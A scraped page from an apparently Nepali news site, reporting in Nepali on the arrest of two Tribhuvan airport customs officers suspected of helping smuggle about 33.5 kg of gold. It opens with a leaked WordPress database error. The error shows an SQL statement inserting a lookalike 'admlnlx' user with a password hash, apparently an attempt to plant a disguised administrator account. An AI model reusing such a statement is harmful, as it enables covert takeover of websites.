WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjUBA7CMTXQUfsYvptAi/UyS9qXyzF.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 16:32:00', '', 'admlnlx', 'admlnlx')
काठमाडौ पुस २८-
साढे ३३ किलो सुन तस्करीमा सघाएको आंशकामा प्रहरीले त्रिभुवन विमानस्थल भन्सार कार्यालयका दुई जना अधिकृतहरुलाई पक्राउ गरेको छ।सिआइबीले विमानस्थल भन्सारका अधिकृतद्धय श्रीनारायण यादव र राजकुमार ढकाललाई पक्राउ गरेको हो। सुन तस्करहरुले उनीहरुसँग मिलेमतोमा सुन भित्र्याएको सिआइबीले आंशका गरेको छ।
पक्राउ परेका भरियाहरुको वयानमा आधारमा सिआइबीले २ जना अधिकृत पक्राउ गरेको पुष्टि गरेको छ। त्यस्तै सिआइबीले सुन तस्करमा सम्लग्न २ जनालाई पनि पक्राउ गरेको छ। अनुसन्धानमा असर पर्ने भन्दै उनीहरुको नाम प्रहरीले सार्वजनिक गरेको छैन्। त्रिभुवन विमानस्थलको सुरक्षा जाँच पार गरेर प्रहरीले साढे ३३ किलो सुन बरामद गरेपछि भन्सार कार्यालयले त्यहाँ कार्यरत २९ जना कर्मचारीलाई जिम्मेवारीबाट हटाएको छ।
सुन काण्डपछि विभागले भन्सार विभागकै उपमहानिर्देशक सुमन दाहालको संयोजकत्वमा छानबिन समिति गठन गरेको छ। गत पुस २१ गते दुवईबाट आएका बाँकेका गोपालबहादुर शाहीको लगेजबाट सिआइबीले साँढे ३३ किलोभन्दा बढी सुन बरामद गरेको थियो। सुन लिन जोरपाटीमा बसिरहेका दिलबहादुर थापा र सन्तोष काफ्लेलाई पनि प्रहरीले पक्राउ गरेर अनुसन्धान अघि बढाएको छ।